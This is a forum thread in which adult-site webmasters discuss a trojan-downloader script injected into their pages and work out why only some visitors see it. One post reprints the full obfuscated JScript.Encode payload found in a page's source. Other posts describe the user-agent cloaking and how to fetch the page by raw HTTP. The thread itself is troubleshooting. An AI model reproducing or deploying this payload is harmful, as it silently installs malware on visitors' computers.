|
Quote:
|
:(
|
Shemp, did you get me right?
That is host who redirects traffic. You webmaster may be doesn't know about redirection, just recommend him to move site to another host. fusionx, there are too many trojan.downloader versions, but as far as I could remember, second file (even if it is downloaded from the same URL) is another file, second file opens a few ports on your comp and it is ready to download and run ANY PROGRAM. Downloaded programs do the rest. |
Tommy from Tommy's Bookmarks was recently having a similar problem.
Nothing seemed to show up for him but a lot of other people were seeing it. I'm not sure what he did to get rid of it. |
Quote:
we don't allow free hosts for preferred submitters... the webmaster must have complete control of the domains. thats part of the agreement of getting a submit account with us.. |
Quote:
|
Quote:
|
fusionx, you have to let it download second program first, but it is dangerous.
Shemp, ok, understand, good rule. |
so snakes server is hacked ?
or how the hell did that thing get there ? man this is scary |
My server hasn't been hacked. I don't get the code, I think it's a jscript exploit that take advantage of certain browsers. But I'm still looking into it.
|
I got a virus on my laptop, and I can't get rid of it! And now I can't not surf, and my wireless connection is totally inexisting (not even showing up on Network Connections screen).
This fucking sucks!!! And they are chasing spammers? WTF? |
Sorry, Snake, but I see this code if I download your page without any browser, so it cannot be problem of certain browsers
GoLiaT, or snakesworld was hacked, or his hosting provider was hacked, or (only in theory) he inserted this code himself. |
Quote:
are you using (wget, or something else?). I'd like to see if i can duplicate from here. - Thanks, jpoker |
If it was hacked don't you think I would be able to see the code? I haven't seen it yet on any of my pages.
I did see it on Pornno.com though so I'm stil trying to figure out why I can see it on his page and not mine. Any tech genius' want to throw in a couple cents? |
This is the source I got at the bottom of the aforementioned 'links' page:
<SCRIPT LANGUAGE="JScript.Encode">#@~^5Q0AAAhahahaha@&@&@&-mD,wWai@&-lMP;w^WC[Ni@&-lMPW(%I@&7lMP8E.sp@&-lM~tbN[n q:LI@&\CD,OKYC^W(Li@&@&6;x1YrW P$C9ADKA/D`*@&`@&ik6`Ul-rTlOWM lawHCs+"xEtk^DKdK0O,q Y+MxOPA62VKDn.r#@&i7DYEMU~Fp@&ikW`ZUm\romOWMR^GK 3kn3 l8V[*@&7iDYEMx,qi@&P~P,P~~,k0vUl7komOGDcw^lO0G.s"xJqr x2 Eb@&PP~~,P~Pi.Y;Mx,Fi@&P,~P,P~Pb0cUm\kTCYKDR!dnDz oxORrU9+ar6cJt?(3,*RXE*'xO8~L[~ l7komYK.R!/nDzonUDRk [+Xr0vE\?&2,v Jbx{Oq#@&~P,P~~,Pd.nDE.x,qp@&7b0vNW1EsnxDR^WK3rnck x9n6}0`rhdka'+6E#@*R8#@&di.+DE.U,Fi@&N@&@&;w^GmNn9 '~lN~DKA/Dc#p@&@&@&b0`e;w^Wl9n[#@& @&d8E.s{J4YD2)JzAASRDG^0XdwK. wC^l1+R1Ws&l9z8l xn.kz O*!+z%y*T*Jbx[WAd`w[lDnJ3`\CDtR.C NG:vb3J~r#c/E(/D.`y~X#3J nX+Jp@&8@&@&0!U^YbW PrxrOaW2`*@& @&P~~,PP~~b0c"aGa#@&,P,PP,P,`@&,P~P,P~7aWw{Ak NWS ^DlD+KW2;a`bi@&7\mD~G~WNz~{P2Wa 9W^!:xYc4K[Xp@&@&@&,P~~,PP,2WaRNK^;:xDR8o/G^W.'r8VmmVEp@&dG$KNzRkOHVnc4KDND,xPr/GVbN~8^lm0~!a6Jp@&7W~W9X /Oz^+ wKdkDkGU{Jl8dKV;YEp@&7KAKNXc/DzVRs+6Yx~r!Jp@&dKAW9z /DX^+ YG2{PE!rI@&i\C.,Y+h2p@&7Yha'v@!f&.PkYHs+{J2WkkOrK x)MnVmYk7nIJ@*@!mP4DnW{Jv_r:-rPGU~VE.xEwCDUDR[Km!:+ YcL+D2s+s+UO~Xq9c-rk{6.C:-r# /Oz^+ \bdk(ksrDX'wE4k[NU'Jv,Jp@&dD+s2_{@&EW HG;k+r!O'ENW1;h+ YconY3s:nxD$X&NcwrmVrn YwJ* kYz^+c\kkk(rVbYz''J4r9N+ wJEP-@&6UHKEk+6\n.{B[W1;:xO T+Y3s:nxD$Hq[v-rmVb+ O-r# /DXsnc\kkr4bVkDzx-r\b/r4sn'JvP'@&W HG;k+fGA 'vwm.xOcNKmEs+ ORT+O2^+hn YAH(Nv-JbmWDm:-E# dDXs+c-kkk8r^kYzx'J-kkr(Vn'JpwlM+ ORaW2RktGAvF~8SFBF#p2CDxDR;wsGmNnN{qial.n YR9G;Vrm0c*iv@*P'@&q'@&@!9qjP~qG'wE1VkUY'JPUPeSA' 'J-kdr(kskDz)4k[[xi~2K/rYbG )C(/KVED+p~YKwlOy*I~^+0DlOy*i'E@*-@&@!b:LPUG1l^t~4KD[nM'F~dDXs+{wrhr9Y4'*Z!aai4+roDtxXZ!wXIP1EDkG.)4l NI-E~9XU/M^''JEQ(EDsQr-EP@*@!JNr7@*@!zl@*@!J[k7@*Ei@&@&@&~,PP,~P,WAK[zRbx +.CP\d'O+s2i@&P~~,PP~7)@&N@&@&W!x^DkKxP1VCxv#@& @&d;2^Wl9nN{Fi@&~~P,P,P~kWcaW2#@&~P,P~~,Pd2GaR4k9n v#I@&8@&@&k6`e;w^WCNNb@&P@&P,~P,PP,rUkDwKwc#I@&ih rx9GhcWU80W.n!xsWm[{msl i@&)@&@&@&0!x^YbWU~GWZ^rm0`#@&`@&P,P,P~P~[Km;:UYcmGG0k+xEs/rw{Xi~alDt'Ji,n6ak.+k'\G ~P2qPG+m,+T!lPy&l*1ll,~j:/iri@&7Skx[GSRd+DPb:nKED`BK4N m^k^3v#IvB&!Zbi@&8@&@&W;x1YbWUPd4Kh2Wac#@& @&~,PP~~,Pr0v;aVGmNN#@&P,~P,P~PiDnO!Dxp@&P,PP,~~P K4N'AkU[Kh +7nxDRd.12VnhxOi@&~,P~,P,Pk6`e2Wa#@&P,P~~,PPP@&P, PP,~~Pik kOwG2v#I@&,~P,P~~i8@&@&7aW2Rk4KhcSk NWSR-+ Y /1Dnn (~Srx9Whcn-+ Yc/^Dnn 5SFBq#p@&7[KmEhn Y oOAVns+ YAHq9cJb{WDm:nE*R/DzVRVWO'Sk NGh n7+UYcdmM+nUoOhrU9WARk^M+n S0Y NK^Es+UYc4G[HRm^r+ YSWO_9W1Eh+UOc4GNH /1DGs^S+WOp@&7NK^!:n Yco+D2^n:xOAHq[crk{6.ls+J* dYHVROW2xSkUNKAR\nUDR/^.+U5 Abx[Khc/mM+UKKwRNKm;hxYc8W9XR1sr+ Y:W2_[G1Eh+ OR(W[zc/m.G^VPWaI@&8@&@&@&6Ex1YbGx,?nYzVs37+xDd`*@& @&rW`aWaR[W^;s+UYc.+mNzjDlYnx{J^Ws2^+OJ,[[,YKOl^W8Le'[G1E:UYclV^ s+ oDtb@&`@&iYGYmsW(Lx[KmEhn Y l^scVn oDti@&d6GDvk~',!I~bP@!,[W1E:UORmV^Rs+ULDtIPbQ_* @&7,PPrWvNGm!hxOcl^V`b#cOlT1C:'xEzJPL'P9Wm!hnxDR mVs`rbck["{Em^knUDmlssr#@&di[Km;s+ YRmV^ck*RGxsW;d:W7n'ktWS2Gwp8@&8@&ddnDKr:GED`Ej YbssA\nxDdv#Ir~,c!Z#p@&8@&@&r0v";2^Wl9nN*@& @&7d+DKb:nW;OvJj+D)V^2-n Y/cbpJSPWTZ#I@&dSkx9WS /YPks+G;D`BSrx9Whc[n0mE^YjYCO!/xJ,EBB TTZ#i@&@&iNGm!hxOchMkY`E@!Nb\~PbNxr|0Dmh+,xlsnxk |0Mlh+~~UKeSAxJ7kdr(kVrOH)4k9[xIaWkkYbW ll(/GV!YnIDWw{Ti^+0DxTiSk9Y4)qI4+ro4O)8iG-D0sGS)4k9[xE@*@!b0Dm:~0Mlh+(W.[D'rqJ,xlsnxJ1Vb+UYW.m:nJ,rN{J^sb+xOWMlh+r~,/OHV'JaWkrYbWU)M+sCDk\IYKw' +X!pV0O'R*W!Ihb[Y4){TZitnrTtO)FTZiE@*@!Jk0Mlsn@*@!z[k7@*vbp@&d9Gm!:+ O hMkD+cB@!C,0GV9nD{Jd4VVldDl.Y!2rPOmDT+Y{J1skxO0M lhnrPk9xJ1VkUOmmV^J~/Oz^+xJ7r/b4rsbYXl4bN[+ I9kdaVmX) W ni(+4l7kG.=ED^ca9+0m;sY[b m4W./^k^3*IJ@*@!&C@*B#I@&iNGm!hxOcoY2^+snxDAzq9`E^^k+ OmmVVrb m^k13c#I@&iNGm!h+ Y AMkYncE@!r0MCs+~kD1'Jm4K;Y=4sl 3E~kYX^n'r\kkr8k^kDXltr[9+Ui9r/aVCz=xWUnpJ@*@!Jr6DCs+@*B#p@&)@&@&bVoEAAhahahaha^# ~@</script> |
I just did a wget from one of my unix server to http://www.snakesworld.com/links.html
and i don't see any of this code. - F |
jpoker,
In any UNIX shell run command telnet www.snakesworld.com 80 You will see something like this: Trying 64.158.30.220... Connected to 64.158.30.220. Escape character is '^]'. Then type something like this: GET /links.html HTTP/1.0 Host: www.snakesworld.com User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98) Accept-Language: en Accept-Charset: iso-8859-1,*,utf-8 Accept: */* Connection: close And press "Enter" twice And you will see page source code. Snake, no I do not think so. Have you turned off cookies? Which IP-addresses did you use to see your page? From how many computers did you try to do it? |
jpoker,
this system checks User-Agent, so wget will not work |
i don't believe it - snake registered for GFY before I did!!!!!!!!!!!!!
hey snake - get into vegas a day early - 2:30pm jan 3 is the TGP VIP party this year |
Quote:
|
Quote:
snake runs a clean site and has NEVER screwed his surfers around, EVER. he's a straight up honest awesome guy I stand behind 100% |
comes up clean for me
|
Quote:
look in your startup folder |
Quote:
Snake, nortons goes off for me to on your page. |
Wtf is this bullshit. I didnt put anything on my site, and of course I cant see it either. :mad:
Now to figure out how to get rid of this shit. JJJ |
Quote:
|
This makes me wonder how many peoples sites are exploited, or machines for that matter.
I surf TGP's all the time looking for galleries and stuff and get popups and virus attempt, exploits and whatever all the time. |
Quote:
|
couldn't the hacker check the ftp logs, and see what ip snake logs in from, and make sure any ip from that block sees the normal page
|
I dont get this code on either site. They both come up clean for me.
|
JJJ, may be you can read own pages better.
Tell us please, what do you see on your main1.html page (via ftp or telnet) between <FONT color=#000000 size=6>Asians</FONT></A> and <P> <FONT color=#ff0000 face=arial size=4> Snake, when you write "There is no code on my pages between the area you mentioned", do you read your page source via browser or directly from your server via ftp or telnet? I asked what do you see via ftp or telnet. bigdog, yes, of course he could |
Steve, I do not see this code any more too.
So I hope we will hear from Snake and JJJ what did they do to stop it. |
I am not seeing it either on both sites, I would have your host investigate how this happened.
|
can't see shit here, maybe only certain ip ranges get the exploit code?
|
OK, problem solved. Now I can go about my business. No details but there was a problem on my server and I assume JJJ"s also. Everything should be clean and back to normal.
Thanks for all the help! |
Snake, did I get you right?
You do not want to help the others who can get the same problem in the future? Why cannot you tell us how did you get this trojun installer onto your page? |
Is there anyone that still gets this when visiting my main page?
http://www.pornno.com/main1.html I am not sure this problem has been corrected for sure on my site. JJJ |
this hacker shit is getting out of hand
|
| All times are GMT -7. The time now is 10:58 PM. |
Powered by vBulletin® Version 3.8.8
Copyright ©2000 - 2025, vBulletin Solutions, Inc.
©2000-, AI Media Network Inc123